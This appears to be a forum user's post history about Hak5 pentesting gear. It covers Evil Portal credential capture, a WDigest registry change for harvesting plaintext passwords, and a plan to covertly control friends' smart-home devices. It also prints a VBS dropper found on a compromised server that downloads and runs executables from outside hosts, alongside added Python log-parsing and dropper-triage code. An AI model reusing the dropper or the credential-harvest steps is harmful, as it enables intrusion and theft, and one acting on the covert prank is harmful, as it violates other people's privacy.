jermzz
Posts posted by jermzz

  1. On 1/20/2024 at 6:55 AM, Skeleton022 said:

    Hi there!


    I'm trying to make an evilportal on the wifi pineapple (OS version: 2.1.2, Evil portal version: 1.5.3, other modules installed, don't know if it helps: hcxdumptool[1.0], httpseek[1.2.1])

    I've made a template using the "New Portal" button, then modified it to my needs. The problem is that when I try it out with my iPhone 13, it fails to reach "http://captive.apple.com/hotspot-detect.html"; instead it tries to find hotspot-detect.html on the webserver.
    There are a lot of these errors in the log file:

    2024/01/20 15:35:51 [error] 25944#0: *9 open() "/www/hotspot-detect.html" failed (2: No such file or directory), client: 172.16.42.143, server: www, request: "GET /hotspot-detect.html HTTP/1.0", host: "captive.apple.com"
    2024/01/20 15:36:02 [error] 25944#0: *17 open() "/www/hotspot-detect.html" failed (2: No such file or directory), client: 172.16.42.143, server: www, request: "GET /hotspot-detect.html HTTP/1.0", host: "captive.apple.com"

    The process (on the iPhone):

    1. I join the open wifi network hosted by the Pineapple with my phone.
    2. The captive portal pops up with the desired visual.
    3. I fill out the required fields in the form, then click on the submit button.
    4. Since it should be a friendly demonstration, the destination URL is set to the rickroll YouTube URL. (In my head it should redirect to YT and start playing the song, then the user could click on the "Done" button in the top right corner to dismiss the captive portal screen.)

    *Meanwhile the phone's ip makes its way to the "Allowed Clients" list. (So there is in fact internet access on the phone...)*

    5. BUT this is where shit hits the fan. There is no "Done" button, only "Cancel", since the phone thinks that the network has no internet on it (since it can't reach the hotspot-detect URL described above).

    Note: If I put a hotspot-detect.html on the Pineapple, the captive portal will not pop up, since iOS finds it and thinks that everything is fine, no need to pop the portal...

    I'm almost sure that this behaviour will be there if I test it with an Android phone, since it too will have a URL to check for internet. (I'll test it later, then edit the post accordingly!)


    Thanks for the help in advance!
    Have a nice day, and happy hacking!

    I have the same problem with iOS, and unfortunately I can't find a fix.

    I set the portal up to just reload the signup page on submit, so I could try submitting multiple times to see what happens.  

    On the first attempt, nothing happens. The login page just reloads. The second attempt, the authorization goes through, and I get the credentials logged. If I hit the submit button a THIRD time, Apple will see the internet, access the captive.apple.com/hotspot-detect.html page, and it will display "Success", and then the Cancel button turns into Done.

    Not sure what causes it since the internet works the whole time. Maybe the iptables rule is taking time.

    Also, for Android everything works fine. At least with the phone I have. It's a Galaxy S9 that's trapped on Android 10. First attempt it captures credentials and closes the portal and grants internet access. So it definitely seems to be an iOS issue.
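    The nginx error lines quoted above are the phone's connectivity probe missing on the portal's webserver. The following is an added diagnostic (editor's example, not code from the thread or from the Evil Portal module) that parses such nginx error-log lines and counts, per client, which OS connectivity-check probe went unanswered; the first two sample lines are the ones from the post, the third is a constructed Android-style probe.

```python
import re
from collections import Counter

# Constructed sample: two nginx error-log lines from the post plus one
# constructed Android-style probe line, so the parser runs offline.
SAMPLE_LOG = """\
2024/01/20 15:35:51 [error] 25944#0: *9 open() "/www/hotspot-detect.html" failed (2: No such file or directory), client: 172.16.42.143, server: www, request: "GET /hotspot-detect.html HTTP/1.0", host: "captive.apple.com"
2024/01/20 15:36:02 [error] 25944#0: *17 open() "/www/hotspot-detect.html" failed (2: No such file or directory), client: 172.16.42.143, server: www, request: "GET /hotspot-detect.html HTTP/1.0", host: "captive.apple.com"
2024/01/20 15:36:10 [error] 25944#0: *21 open() "/www/generate_204" failed (2: No such file or directory), client: 172.16.42.150, server: www, request: "GET /generate_204 HTTP/1.1", host: "connectivitycheck.gstatic.com"
"""

# Well-known OS connectivity-check endpoints, keyed by (Host header, path).
PROBES = {
    ("captive.apple.com", "/hotspot-detect.html"): "iOS/macOS",
    ("connectivitycheck.gstatic.com", "/generate_204"): "Android",
}

# nginx error-log layout: timestamp, level, free text, then client/request/host.
LINE_RE = re.compile(
    r'^(?P<ts>\S+ \S+) \[(?P<level>\w+)\] .*?client: (?P<client>[\d.]+), '
    r'.*?request: "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+", '
    r'host: "(?P<host>[^"]+)"'
)

def parse_line(line):
    """Return the fields we care about, or None if this is not an nginx error line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["platform"] = PROBES.get((rec["host"], rec["path"]))  # None if not a known probe
    return rec

def probe_summary(text):
    """Count failed connectivity-check probes per (client IP, platform)."""
    counts = Counter()
    for line in text.splitlines():
        rec = parse_line(line)
        if rec and rec["platform"]:
            counts[(rec["client"], rec["platform"])] += 1
    return counts

if __name__ == "__main__":
    for (client, platform), n in sorted(probe_summary(SAMPLE_LOG).items()):
        print(f"{client:<16} {platform:<10} unanswered probes: {n}")
```

    A client that keeps appearing here after it has been allowed through is the symptom the thread describes: the device is still waiting for its probe to succeed.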

  2. If you're connecting by serial then you're in arming mode which doesn't support Ethernet. Use one of the switches and set to Ethernet attack vector. Then you may run the bb.sh and ssh into your bunny. Took me a few min to figure this out as well. 

  3. 3 minutes ago, one2 said:

    Yeah I guess I should have specified that I would like to primarily add the registry modification into the stealth payload (pulling up the registry and modifying the WDigest "UseLogonCredential" to 1) on the first run, rather than either loading up PowerMemory or modifying the registry manually (allotted time would be minimal). Then wait for the target machine to be rebooted before inserting the RD once more to grab the plain text.

    So you need two payloads :)

  4. 3 hours ago, sud0nick said:

    Fun fact, I thought the exact same way a couple years ago and built PortalAuth to automatically authenticate the Pineapple with captive portals (hence the name).  newbi3 pretty much told me the same thing I told you and over time the module evolved into a cloner more than something that just bypasses captive portals.

    Makes perfect sense. It's funny I was going through loops to do something so easy, as I just thought about it logically. Guess I don't think out of the box well? Thanks again, nick.

  5. 2 hours ago, sud0nick said:

    Connect the Pineapple to the AP, connect your laptop to the Pineapple, open a browser, click and get interwebz.

    I want to control the Pineapple by wifi rather than tether from my laptop. The only way I've found so far that works is to use macchanger to clone the MAC of my wireless wlan2 with my Kali box and then disconnect/connect the Pineapple.

  6. You don't need the LAN turtle. Just plug the cord into your computer, then plug your pineapple into the USB port. Share internet to the pineapple, and then you should be able to connect to the management interface via wifi from your other devices. 

    I would strongly suggest disabling your open interface, making a strong password for your management interface and changing your pineapple IP address if you're going to do this... for security reasons. 

    I have the field kit. It's great. Although it looks like it was made for the MKV, it still works for my nano, but I'd love to see a kit (it would probably have to be marginally larger) that would fit the tetra somehow. The tactical bag isn't really realistic for me when carrying all my other things, and I've been just carrying my tetra in its box in my bag. It works for now, but this is something I'd love to see. A field kit case that carries all the current goodies plus a tetra.

  8. Anyone know a good method to authenticate the pineapple with a portal that makes you click to accept and get internet? Usually I would put my laptop on the wifi and then share internet to the pineapple, but I would like to use client mode and have the pineapple sit by itself and manage it via the management interface. 


    thanks. 

    Thanks man, this helped me. I couldn't get my Tetra working for an hour. Ended up starting it like you said, and repeatedly pounding the reset button hard like 50 times, and then the continue button finally worked.

    Honestly makes me wonder about quality control. I was really distraught that I was about to have to RMA my Tetra. I knew I was doing the process right, as I have a nano which works flawlessly now. I say now because my first one was defective, had to get replaced.

    Additionally, I just read that some of the Pineapple Juice 1500s have the shut-off problem..... I got my field kit and didn't use my 1500 for quite a while because I didn't need it really, and because I have a couple other Ankers that work well. Then, when I went to use it 4 (est) months later, it would just turn off when I tried to plug something in. I shrugged it off because who knows what I may have done unknowingly, and the fact that I had more USB chargers made it negligible.

    I've sent hak5 in total probably $1500 of my hard-earned money, and it seems that most of my featured products have had major flaws that inhibit their basic functionality. Replaced nano, broken Pineapple Juice, abusive handling for my Tetra to work properly.....

    Hopefully at the least hak5 will replace my pineapple juice 1500. I really do like my products when I get them in working order. I'll reach out to them next week.

    Jeremy  

  10. It all started yesterday when she realized her VM, which is a Windows Server 2012 R2 machine her friend hosts for her (Hyper-V), was running at max load. The only real thing she hosts on it is her personal website that she sells some stuff on for fun. Anyway, upon further inspection, she saw a suspicious process taking up tons of CPU. Looked like a legit Microsoft service except it was in a tmp directory. So obviously a virus. But why?

    So looking deeper, a script was found in C:\, a VBS script, (insert garbage here).vbs. Here's what was in it.

    ' Stage 1: fetch a binary over HTTP using the MSXML HTTP client
    Set Post = CreateObject("Msxml2.XMLHTTP")
    Set Shell = CreateObject("Wscript.Shell")
    Post.Open "GET","http://www.game918.me:2545/host.exe",0
    Post.Send()
    ' Write the raw response body to disk through an ADODB binary stream
    Set aGet = CreateObject("ADODB.Stream")
    aGet.Mode = 3              ' adModeReadWrite
    aGet.Type = 1              ' adTypeBinary
    aGet.Open()
    aGet.Write(Post.responseBody)
    afile = "host.exe"
    aGet.SaveToFile afile,2    ' adSaveCreateOverWrite: replace any existing file
    ' Launch the dropped file
    Shell.Run (afile)

    ' Stage 2: the same routine again for a second binary, dropped as svchost.exe
    Set Post = CreateObject("Msxml2.XMLHTTP")
    Set Shell = CreateObject("Wscript.Shell")
    Post.Open "GET","http://huya1219.top/svchost.exe",0
    Post.Send()
    Set aGet = CreateObject("ADODB.Stream")
    aGet.Mode = 3
    aGet.Type = 1
    aGet.Open()
    aGet.Write(Post.responseBody)
    afile = "svchost.exe"
    aGet.SaveToFile afile,2
    Shell.Run (afile)

    It appears it was downloading executables that were scripts and then copying them to run? Not sure what the point of that would be unless they want to be able to update the script via the web. Anyway, it turns out it scheduled a task to run hourly to run itself again. A bitcoin mining service. This little bastard spidered everywhere.

    My question is HOW did this asshat get in? We ran netstat and found a bunch more stuff. A bunch of modified (or maybe added?) DLL files in the MySQL server plugins folder. I'm assuming it was some MySQL vulnerability for arbitrary file upload? I'll post a couple pictures of the files infected. We searched for files modified on the infection date (5/1). We ended up wiping the VM and starting another. No telling what else was infected, or maybe a keylogger.... Crap this sucks. We really just want to know what needs to be patched. Hopefully someone can add some insight.

    http://imageshack.com/a/img924/108/gsFTxn.jpg

    http://imageshack.com/a/img921/2816/WCHbBN.png

    http://imageshack.com/a/img924/1098/2TjwUx.png
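    The dropper in the post has a recognisable three-object shape: an MSXML HTTP request, an ADODB.Stream written to disk, and a Wscript.Shell launching the result. As an added triage aid (editor's example, not code from the thread), the script below statically scans a .vbs file for that shape and pulls out the download URLs and the dropped/executed file names as IoCs; the embedded sample is constructed to mirror the post's script, with the real hosts replaced by a placeholder domain.

```python
import re

# Constructed sample modelled on the dropper in the post; the host is a
# placeholder (example.invalid), not one of the domains from the incident.
SAMPLE_VBS = '''Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://dl1.example.invalid:2545/host.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
afile = "host.exe"
aGet.SaveToFile afile,2
Shell.Run (afile)
'''

# The three COM objects that together make up a download-save-execute dropper.
STAGES = ("Msxml2.XMLHTTP", "ADODB.Stream", "Wscript.Shell")

DOWNLOAD_RE = re.compile(r'\.Open\s+"(?:GET|POST)"\s*,\s*"(https?://[^"]+)"', re.I)
SAVE_RE = re.compile(r'\.SaveToFile\s+(\w+)\s*,', re.I)        # SaveToFile <var>, <mode>
RUN_RE = re.compile(r'\.Run\s*\(?\s*(\w+)', re.I)               # Shell.Run (<var>)
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"', re.I | re.M)  # var = "literal"

def triage_vbs(text):
    """Return extracted IoCs plus a verdict on whether the script is a dropper."""
    lowered = text.lower()
    objs = {o for o in STAGES if o.lower() in lowered}
    assigns = dict(ASSIGN_RE.findall(text))          # resolve string variables
    urls = DOWNLOAD_RE.findall(text)
    dropped = [assigns.get(v, v) for v in SAVE_RE.findall(text)]
    executed = [assigns.get(v, v) for v in RUN_RE.findall(text)]
    # Verdict: all three stages present, at least one fetch and one launch.
    is_dropper = objs == set(STAGES) and bool(urls) and bool(executed)
    return {"urls": urls, "dropped": dropped, "executed": executed,
            "objects": sorted(objs), "dropper": is_dropper}

if __name__ == "__main__":
    import json
    print(json.dumps(triage_vbs(SAMPLE_VBS), indent=2))
```

    Point it at every .vbs found under C:\ and at the scripts referenced by scheduled tasks; the URLs and file names it returns are what to block and hunt for on the other hosts the post says it spread to.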

  11. If you use OpenVPN, you should be able to put a remote computer on the network with bettercap / whatever you want to do. That's what I do anyway. The target network will just obviously need Internet access.

  12. I've had issues cracking WEP using an AP that has just been created for cracking purposes. Same issues. But when I've tried on all real networks with tablets and phones and computers attached, it's only been a short time before ACK requests started capturing IVs. Try on a real network.

  13. Hello. I have my Turtle set up on my network using OpenVPN to tunnel to my VPS. Everything works, but I wish the Turtle to assign IPs from my home subnet that the Turtle resides on instead of its own subnet.

    I.e. the Turtle subnet is 172.42.x.x, and my home network, which the Turtle is plugged into, has subnet 10.0.x.x (Comcast).

    When I connect remotely, my devices are assigned IP 172.42.x.x, and I wish them to be 10.0.x.x.

    How can I accomplish this? Almost like I need it to be an access point. I have this in another section but I think it's a better fit question here.

    Thanks.

  14. I see, yes, you're right, I'm getting a 172.x.x.x address from the Turtle on that interface when I run ifconfig on my phone.

    Is there a way I can make the Turtle assign addresses from the 10.0.0.1/24 network my home runs on?

    I could set up my own VPN at home. But I was looking for a drop and go solution such as the turtle. Can't set a VPN up at my buddy's place.

  15. I know, first response is "yes dummy," but I want to do something kind of specific. My home and most of my friends' are all turning into smart homes. We have an Echo controlling our TV and Wemo lights and plugs, using Harmony and Fire TV, etc. All using apps from our phones. I wanted to try and play a little trick on my friends and girlfriend by remotely controlling the home devices when they're using them.

    I have my Turtle currently connected to my home network running OpenVPN to my DigitalOcean VPS. I can connect to my network remotely with other devices. I can ping devices on my network, Nmap, etc, but I can't use any of the apps designed to work with them directly. I.e.: Alexa, Fire TV. I'm assuming this is because the apps look for Internet via (in the case of my Galaxy S7) wlan0 instead of the tun0 interface my Turtle creates with the VPN.

    When that didn't work because I was not on wifi, I tried to connect my phone to the VPN and then Hotspot it to another device so I'd be on wifi which also failed because of how the VPN works.

    Does anyone have any idea how I could get something like this to work? Or is it not possible? Devices I have to work with: Turtle, Nano, Kali live USB and NetHunter tablet.

    TIA for any input

    Jermzz

  16. You can use fingerprint on secondary ROMs with MultiROM. I ended up messing with MultiROM for a bit, just flashed CM13 for my primary ROM and it's great, everything works but I haven't tried Google Pay. Also the systemless root on the Nexus 6P is awesome, I was hesitating for a long time about it but very happy I did.

    I had an AT&T Moto X 2013 that it worked fine on, but I had root for tethering, I never tried it non-rooted. My stock Nexus 6P wouldn't USB or wifi tether with the stock ROM due to TOS conditions of AT&T, or in my case Straight Talk. After root everything worked just fine. Marshmallows everywhere

    Interesting. I think you have to pay for tether with AT&T. My plan has hotspot, but I can't use it with my nano because it's an iPhone. Hopefully no problem with the S7, although I'm sure there will be a root method shortly.

  17. SSLstrip+ was incorporated into MITMf a while ago, along with a DNS server. When I tried using it to MITM my home network, HSTS still prevailed. No logins, HTTPS at the top of all the pages.

    Can someone explain how bettercap is different?

  18. Since I can't get CSS files to load, I just use CSS style tags in splash.html and that works. But if you put your images in /etc/nodogsplash/htdocs/images you should be able to reference them by just using images/image.png. I get background images to load that way. Don't put them in /www if that's how you're trying. Anyway, all moot since it will all be changed soon. You can use this temporarily though.
